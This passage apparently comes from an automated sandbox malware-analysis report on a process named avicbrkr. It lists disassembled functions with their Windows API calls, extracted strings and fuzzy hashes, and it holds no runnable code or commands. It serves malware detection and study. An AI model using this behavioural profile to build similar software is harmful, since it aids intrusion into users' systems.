                      • Opcode ID: 9a6add339eae09ff4e9a659d16d295a93debb3df0a31ec17b7afd77da4d89d20
                      • Instruction ID: 7858d77b6f9c38a908a792ff895cb9223bc3815fe215c0c79ce0f0c096179c9c
                      • Opcode Fuzzy Hash: 9a6add339eae09ff4e9a659d16d295a93debb3df0a31ec17b7afd77da4d89d20
                      • Instruction Fuzzy Hash: 25018433A9A26572D63377AA5C0BFCB3D1C9F46BF2F204115F60CA91C29E59544081FA
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00377E31, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(00377A4C,?,?,?,?,00000008,00377A4C,00000000,?), ref: 00377E4E
                      • memcpy.NTDLL(00377A4C,?,00000009,?,?,?,?,00000008,00377A4C,00000000,?), ref: 00377E70
                      • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 00377E88
                      • lstrlenW.KERNEL32(00000000,00000001,00377A4C,?,?,?,?,?,?,?,00000008,00377A4C,00000000,?), ref: 00377EA8
                        • Part of subcall function 00377D93: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00377DA7
                        • Part of subcall function 00377D93: memcpy.NTDLL(00000000,00377EC2,?,?,00000008,?,00377EC2,00000000,00000000,?), ref: 00377DD0
                        • Part of subcall function 00377D93: RegCloseKey.ADVAPI32(?,?,00377EC2,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00377A4C,00000000), ref: 00377E22
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377ECD
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HeapTimememcpy$AllocateCloseCreateFileFreeSystemlstrlen
                      • String ID:
                      • API String ID: 1553019701-0
                      • Opcode ID: 05fd76fd7c5a1c04b3d67fa1bb31d2edaab574e63de4361ccc3a10b5bd00525f
                      • Instruction ID: 78a16d317c2d15b8baae8482e2e56ae36836121143b0b13d11830c1d0dbfee5f
                      • Opcode Fuzzy Hash: 05fd76fd7c5a1c04b3d67fa1bb31d2edaab574e63de4361ccc3a10b5bd00525f
                      • Instruction Fuzzy Hash: 24114676D05208BBCB229BA4DC09FDE7FBDEB48750F048056F909E7291E675D604CB54
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00634A4D, Relevance: 7.6, APIs: 5, Instructions: 59stringthreadtimeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0063115F: RtlAllocateHeap.NTDLL(00000000,?,00633BA9), ref: 0063116B
                      • GetCurrentThreadId.KERNEL32(?,?,?,00634AE0,?,0063763C,00000000,00632DC5,00000750), ref: 00634A85
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00634AE0,?,0063763C,00000000,00632DC5,00000750), ref: 00634A91
                      • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 00634A9F
                      • PathFindExtensionA.SHLWAPI(00000000), ref: 00634AB3
                      • lstrcpy.KERNEL32(00000000), ref: 00634ABA
                        • Part of subcall function 00631174: HeapFree.KERNEL32(00000000,?,00633C0E), ref: 00631180
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: FileHeapTime$AllocateCurrentExtensionFindFreeNamePathSystemTempThreadlstrcpy
                      • String ID:
                      • API String ID: 1355202529-0
                      • Opcode ID: ea1d292d867390d0687359efa4ac4b60ecc6905a18c5a198638d3fe2b5387cd9
                      • Instruction ID: 331f2169d9c1a80752c1095cc5c59d974f2af1b5342673afc52040785557b075
                      • Opcode Fuzzy Hash: ea1d292d867390d0687359efa4ac4b60ecc6905a18c5a198638d3fe2b5387cd9
                      • Instruction Fuzzy Hash: FB01B172E002157FD7505FB4CC89EABBA6EEF00B44B091225BA02E7205DF70ED0486F4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00375DC6, Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0038ECF0: lstrlen.KERNEL32(0039D47C,0039D418,00000000,?,0038F79B,0039D47C,0039706C,00000000,00397050,0039D424,0039D424,00000000,0038F2FB,00000000,?,?), ref: 0038ECFC
                      • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00375DEF
                      • memcpy.NTDLL(00000000,?,?), ref: 00375E02
                      • RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375E13
                      • RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375E28
                        • Part of subcall function 0037B171: lstrcmpi.KERNEL32(?,0039E4AD), ref: 0037B1C8
                        • Part of subcall function 0037B171: HeapFree.KERNEL32(00000000,00000000,00375E4C), ref: 0037B1F5
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 00375E60
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$CriticalFreeSection$AllocateEnterLeavelstrcmpilstrlenmemcpy
                      • String ID:
                      • API String ID: 382049228-0
                      • Opcode ID: 0c1a35a1d77ac966d595b37a1e68d6b588e0f88a87363324ff3bbda2b956840e
                      • Instruction ID: ace6a1740fa7671c58c7fb6b5dcc9e817c7abd28ad471710b7a535ce4f6a13e2
                      • Opcode Fuzzy Hash: 0c1a35a1d77ac966d595b37a1e68d6b588e0f88a87363324ff3bbda2b956840e
                      • Instruction Fuzzy Hash: A3110836105210AFCB276F28EC45D6B7BACEB46321B06417BF90593260D7765C01CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037AA37, Relevance: 7.6, APIs: 5, Instructions: 55memoryregistryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0037AA58
                      • wsprintfA.USER32 ref: 0037AA6D
                      • RegCreateKeyA.ADVAPI32(80000001,0039D500,00000000), ref: 0037AA85
                      • RegCloseKey.ADVAPI32(?), ref: 0037AAAD
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037AABC
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseCreateFreewsprintf
                      • String ID:
                      • API String ID: 1380539425-0
                      • Opcode ID: 823351ce407c9a1f4fdd12a085a912f7b3b6299bafef1554c9cc858a927dffcd
                      • Instruction ID: 6a38addf92bf20fcdc4b13cc1c8805b54b4ce0657339c0549c1f40977c49b49d
                      • Opcode Fuzzy Hash: 823351ce407c9a1f4fdd12a085a912f7b3b6299bafef1554c9cc858a927dffcd
                      • Instruction Fuzzy Hash: 75014036110104BFDB139B94EC49EAE3F7DEB44750F104026FA0491170EB779D509B60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003883F6, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0037138B,?), ref: 003883FE
                      • GetVersion.KERNEL32 ref: 0038840D
                      • GetCurrentProcessId.KERNEL32 ref: 0038841C
                      • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00388439
                      • GetLastError.KERNEL32 ref: 00388458
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                      • String ID:
                      • API String ID: 2270775618-0
                      • Opcode ID: a03eacdcc369fcbddbe622496a2aed673d5db8c9c6d851f80482da34fff6da2a
                      • Instruction ID: 073505357034a0651eae2bdcf41895d90d28852a11fd85c372b176fc9730041f
                      • Opcode Fuzzy Hash: a03eacdcc369fcbddbe622496a2aed673d5db8c9c6d851f80482da34fff6da2a
                      • Instruction Fuzzy Hash: B8F09A71656303AFE763AB26AD0BB193B6DA704710F104817E696C62E0DF72C441EB28
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037E2B8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95memoryCOMMON
                      Download Yara Rule
                      APIs
                      • StrToIntExA.SHLWAPI(?,00000000,?), ref: 0037E339
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 0037E369
                      • memcpy.NTDLL(00000000,?,?), ref: 0037E37A
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateHeapmemcpy
                      • String ID: ~FvR9
                      • API String ID: 1925790395-3041887914
                      • Opcode ID: 347d843cc31e2ed5ddde96db54223f82da017abed62ad343a9f829d81fcca16c
                      • Instruction ID: b8a36cd47404ab188014586b9058faee5714ec68053244251a967d2a1a6b5535
                      • Opcode Fuzzy Hash: 347d843cc31e2ed5ddde96db54223f82da017abed62ad343a9f829d81fcca16c
                      • Instruction Fuzzy Hash: 2131A632900165EFDB32EF94C4848ADB7B9AB09314F66C6BBE5199B141D7789E44CB40
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00389D46, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77stringCOMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00389D75
                      • lstrlen.KERNEL32(00000000), ref: 00389D86
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • StrChrA.SHLWAPI(00000000,0000003A), ref: 00389DA7
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFreelstrlenmemset
                      • String ID: ~FvR9
                      • API String ID: 1136211775-3041887914
                      • Opcode ID: bf9941108329c4346274a1059293b887e12c037d85fe6777c07c00ecd83aeb20
                      • Instruction ID: d51e3a56b2cda31ccf77e91b76f104865d05e84967dcab8643083440ce1781e8
                      • Opcode Fuzzy Hash: bf9941108329c4346274a1059293b887e12c037d85fe6777c07c00ecd83aeb20
                      • Instruction Fuzzy Hash: 6521CF72500301AFDB22AF64DC89B3A77ACFF44312F09885BF95687291EBB5D844CB65
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00376DBD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68synchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • RtlUpcaseUnicodeString.NTDLL(?,?,00000001), ref: 00376DF0
                        • Part of subcall function 0038D759: OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,pnls), ref: 0038D784
                        • Part of subcall function 0038D759: CloseHandle.KERNEL32(?), ref: 0038D7F9
                        • Part of subcall function 0038D759: GetLastError.KERNEL32 ref: 0038D801
                        • Part of subcall function 0038D759: CloseHandle.KERNEL32(?), ref: 0038D813
                        • Part of subcall function 0038D759: GetLastError.KERNEL32 ref: 0038D81B
                      • RtlFreeAnsiString.NTDLL(?), ref: 00376E68
                      • WaitForSingleObject.KERNEL32(00000000), ref: 00376E76
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseErrorHandleLastString$AnsiFreeObjectOpenProcessSingleUnicodeUpcaseWait
                      • String ID: pnls
                      • API String ID: 1493223076-141991303
                      • Opcode ID: 446c976666b1caa1fc3137b7920a5a01aca9f48a3ef656b57365b6cb0074c012
                      • Instruction ID: 9267b6d3d3f427db7267ea80a4830dcb3b153165916bcb3783c580174afa6b0b
                      • Opcode Fuzzy Hash: 446c976666b1caa1fc3137b7920a5a01aca9f48a3ef656b57365b6cb0074c012
                      • Instruction Fuzzy Hash: 21210536114B119BCB32DF24DE5A66B73A9AB40700F10CD1AF048C3991D779E85487A1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00387E3D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003877A0: GetLastError.KERNEL32(00000024,?,003879FB,00000000,00000000,00399550,00000014,003881BE,?,00000000,?,?,00000000,0039C828,00000000), ref: 003877CD
                      • RtlEnterCriticalSection.NTDLL(H}*), ref: 00387EB3
                      • RtlLeaveCriticalSection.NTDLL(H}*), ref: 00387ED1
                      • GetLastError.KERNEL32(?,00375F66,00397048,00376483,?,?,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001), ref: 00387EE1
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalErrorLastSection$EnterFreeHeapLeave
                      • String ID: H}*
                      • API String ID: 132096965-3236088583
                      • Opcode ID: e14356346919da57b776125c2e9180d4368cd99a1337e5e9237dd777ed5adfa4
                      • Instruction ID: 072dc91d5b6249f1f68081d96f09f3e746a6efe0b6f2ee7fa8d79f9e2f68b510
                      • Opcode Fuzzy Hash: e14356346919da57b776125c2e9180d4368cd99a1337e5e9237dd777ed5adfa4
                      • Instruction Fuzzy Hash: 7D2109B5600701AFD712DFA9C98595AB7F9FB08300B1045AAEA55D7B50D771FD04CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00371473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 003714AA
                        • Part of subcall function 0038939D: GetLocalTime.KERNEL32(?), ref: 003893A7
                        • Part of subcall function 0038939D: wsprintfA.USER32 ref: 003893D3
                      • wsprintfA.USER32 ref: 003714CD
                        • Part of subcall function 0037BB29: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,003714F5,?,00000000,00000000,00000000,00000006), ref: 0037BB47
                        • Part of subcall function 0037BB29: wsprintfA.USER32 ref: 0037BB65
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 003714FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: wsprintf$HeapTime$AllocateFreeLocalSystem
                      • String ID: | "%s" | %u
                      • API String ID: 1069605159-3278422759
                      • Opcode ID: 56df0ffb472515aa91a2eacb24ea1a1d7b02913f79275164be0536adcd4bdedd
                      • Instruction ID: 07d2ddaf8b36850160192bb7221ea915e8e4be8f57aace13e3b66cedfd9b7490
                      • Opcode Fuzzy Hash: 56df0ffb472515aa91a2eacb24ea1a1d7b02913f79275164be0536adcd4bdedd
                      • Instruction Fuzzy Hash: A311C272500208BFDB22AF69DC45DAB7FADEB85364F104063F80997261E6369E119BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003876EB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,00389308,?,?,00000000,?,00373090,00000000), ref: 00387737
                      • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,00389308,?,?,00000000,?,00373090,00000000), ref: 00387742
                      • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 0038774E
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$NameTempTime$CountCreateCurrentDirectoryFreeHeapSystemThreadTicklstrcpy
                      • String ID: \Low
                      • API String ID: 2388808970-4112222293
                      • Opcode ID: d3f872c76bb047f5bab7ce49ce3f45f97301be82d218cc62b00b58c5d91583e3
                      • Instruction ID: 8c741859edbda50e2fe667cd432664b1ea5dda6707c5d2b0e37f8eb7007ffbfd
                      • Opcode Fuzzy Hash: d3f872c76bb047f5bab7ce49ce3f45f97301be82d218cc62b00b58c5d91583e3
                      • Instruction Fuzzy Hash: F3012F312197206AC2337B799C88F7B3A8E9F01B91F2600A1F200E2280DB19C900C7B4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037A9A8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0037A9BF
                        • Part of subcall function 0038FD85: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,00000004,00000002,?,00000016,00000000,00000000,00000004,00000004,?,20000013,00000000), ref: 0038FE5E
                        • Part of subcall function 0038FD85: GetLastError.KERNEL32 ref: 0038FE78
                      • memcpy.NTDLL(?,?,00004000,?,?,0037C95D,?,?), ref: 0037A9FD
                      • HeapFree.KERNEL32(00000000,?), ref: 0037AA1F
                      Strings
                      • Access-Control-Allow-Origin:, xrefs: 0037A9AD
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorHeapLast$AllocateFreememcpy
                      • String ID: Access-Control-Allow-Origin:
                      • API String ID: 2309960269-3194369251
                      • Opcode ID: 327749d454cf6b188ae794036aa7e7ed975c0591b6053f0f8080b11f43b56aca
                      • Instruction ID: efa500329ade09ba14a9b7ac28f71ee8f4d1cae7654c8d60d26aed8d6a65dc4c
                      • Opcode Fuzzy Hash: 327749d454cf6b188ae794036aa7e7ed975c0591b6053f0f8080b11f43b56aca
                      • Instruction Fuzzy Hash: 0D118B76910605FFCB239F54EC45E5EBBB9EBC5360F208065F909A72A0E7369D60DB20
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00373C83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00010000), ref: 00373CA0
                      • lstrlen.KERNEL32(EMPTY,?,?,00000000,?,00000000,?), ref: 00373CDC
                        • Part of subcall function 0038F08B: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038F1E9
                        • Part of subcall function 0038F08B: StrTrimA.SHLWAPI(00000000,003973F8), ref: 0038F222
                        • Part of subcall function 0038F08B: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038F285
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,?,00000000), ref: 0038F30A
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,?,0039D478), ref: 0038F355
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,00000000,0039F27A), ref: 0038F368
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,00000000,?), ref: 0038F377
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,?), ref: 0038F38D
                        • Part of subcall function 0038F08B: HeapFree.KERNEL32(00000000,00000000), ref: 0038F39C
                      • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 00373CF3
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$CriticalLeaveSection$AllocateTrimlstrlen
                      • String ID: EMPTY
                      • API String ID: 2541751434-1696604233
                      • Opcode ID: b89c83dbb421907c72edc0554dbbe78e668266a41b3b43b606bd00ad986ebeef
                      • Instruction ID: 6f4a29d4cbc304f0fa8326326635e7fd8422c1768418aa325c92ac4e3f64019a
                      • Opcode Fuzzy Hash: b89c83dbb421907c72edc0554dbbe78e668266a41b3b43b606bd00ad986ebeef
                      • Instruction Fuzzy Hash: B3018F72500218FFDF239F959C49CAF7F7DEB89760B108066F904A2220E67A4E50EB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0063144F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryA.KERNEL32(00638019), ref: 0063145E
                      • GetModuleHandleA.KERNEL32(00638019,00638000,?,?,0063178B,00000000,?,00637614), ref: 00631484
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: HandleLibraryLoadModule
                      • String ID: pnls$pnls
                      • API String ID: 4133054770-253294419
                      • Opcode ID: c6b46f3693df74f61e1cc71e5aea72fd665d8661b7ae3fca275f59ba8575b8b3
                      • Instruction ID: 82c0c1202a15d8a17d29cda161c5fc087ead71f2f73dcd54ad9d13d47cca7f13
                      • Opcode Fuzzy Hash: c6b46f3693df74f61e1cc71e5aea72fd665d8661b7ae3fca275f59ba8575b8b3
                      • Instruction Fuzzy Hash: 3EF0C272A00715BBDB248BE99D46FEF76EEDB09750F148115B901E3241DBA8ED0046E4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038CA67, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 0038CAB1
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CountHandleModuleTickwsprintf
                      • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
                      • API String ID: 218054273-3263720277
                      • Opcode ID: 02e69d58531791534e43849f96d1fc02c3869bd6257161d8254300b81151aa2b
                      • Instruction ID: 3ee0ab9f7c4284d3a0733b584905713c070ee05a1f0b166e9a6cee91654e8882
                      • Opcode Fuzzy Hash: 02e69d58531791534e43849f96d1fc02c3869bd6257161d8254300b81151aa2b
                      • Instruction Fuzzy Hash: BB0148B6D00218BFCF01EF95DC09AEEBBB8EF08705F004052F901B6190E7759A54CBA5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00372DAE, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                      Download Yara Rule
                      APIs
                      • StrChrA.SHLWAPI(?,0000002C), ref: 00372DB9
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                      • StrTrimA.SHLWAPI(00000000,003973F4), ref: 00372DD9
                        • Part of subcall function 003724A8: lstrlen.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000), ref: 003724BF
                        • Part of subcall function 003724A8: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 003724D2
                        • Part of subcall function 003724A8: lstrcpy.KERNEL32(00000008,00000000), ref: 003724F4
                        • Part of subcall function 003724A8: CreateThread.KERNEL32(00000000,00000000,0037245F,00000000,00000000,00000000), ref: 0037250C
                        • Part of subcall function 003724A8: CloseHandle.KERNEL32(00000000), ref: 00372517
                        • Part of subcall function 003724A8: GetLastError.KERNEL32(?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000,0039E1CF,0037D7DB,00000000,00000000), ref: 0037251F
                        • Part of subcall function 003724A8: HeapFree.KERNEL32(00000000,00000000), ref: 00372530
                      • GetLastError.KERNEL32(?,00000000,?), ref: 003731DA
                        • Part of subcall function 00371473: RtlAllocateHeap.NTDLL(00000000,?), ref: 003714AA
                        • Part of subcall function 00371473: wsprintfA.USER32 ref: 003714CD
                        • Part of subcall function 00371473: HeapFree.KERNEL32(00000000,00000000,?), ref: 003714FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateErrorFreeLastlstrlen$CloseCreateHandleThreadTrimlstrcpymemcpymemsetwsprintf
                      • String ID: L"7
                      • API String ID: 717256268-2580434585
                      • Opcode ID: 9613318f68cbb36bc9516477e1b8dc5cd05f6351f0bb91f8637a34fed82795cb
                      • Instruction ID: 1e9a7a0a82f0eddc4ac14e681654bac287f723b9a7b17dc4db55ac9bea4e9a99
                      • Opcode Fuzzy Hash: 9613318f68cbb36bc9516477e1b8dc5cd05f6351f0bb91f8637a34fed82795cb
                      • Instruction Fuzzy Hash: FBF08B332541909BC7333FB8AC46DBF2B5D9B46370F568425F92AF70D0CD1A4A406361
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00388060, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                      Download Yara Rule
                      APIs
                      • RtlEnterCriticalSection.NTDLL(H}*), ref: 0038806B
                      • RtlLeaveCriticalSection.NTDLL(H}*), ref: 0038807C
                      • GetLastError.KERNEL32(?,00000001,003880EB,00000000,0039C828,00000000,00378569,0000000D,0039C778,0000000D,0039C828,0000000D,0039EB2C,?,0037D9D1), ref: 003880BA
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterErrorFreeHeapLastLeave
                      • String ID: H}*
                      • API String ID: 132244544-3236088583
                      • Opcode ID: d81eb68aaf55f2678cc627bf9bc5093636ceb8f75f0ddd9ef677f9027cafec27
                      • Instruction ID: 355c2a8c72d57ffb4085e6f2d2b6e63717082a63b3c568b6174bee6b8f785317
                      • Opcode Fuzzy Hash: d81eb68aaf55f2678cc627bf9bc5093636ceb8f75f0ddd9ef677f9027cafec27
                      • Instruction Fuzzy Hash: 1801A2B5200704EFD7229F69CC05D6AB7FEEF84320F104569EA56937A0CB31ED058B64
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003877DB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35stringCOMMON
                      Download Yara Rule
                      APIs
                      • RtlEnterCriticalSection.NTDLL(H}*), ref: 003877EC
                      • lstrcmp.KERNEL32(?,00000000), ref: 00387810
                      • RtlLeaveCriticalSection.NTDLL(H}*), ref: 0038782A
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterLeavelstrcmp
                      • String ID: H}*
                      • API String ID: 4188137280-3236088583
                      • Opcode ID: 967df6e42629420db180b7e872c37e7f3ac292f78cea488b1ff2a077323e3a82
                      • Instruction ID: 48f067ebf2e425eeba4566115a536855e6ad6b34767cfd1a9501a0ad979f51a6
                      • Opcode Fuzzy Hash: 967df6e42629420db180b7e872c37e7f3ac292f78cea488b1ff2a077323e3a82
                      • Instruction Fuzzy Hash: E2F0F636514300EBCB22AF01DC8ADA9B7BEFB00361F224095F80263250C735FC40DBA4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00372D5E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
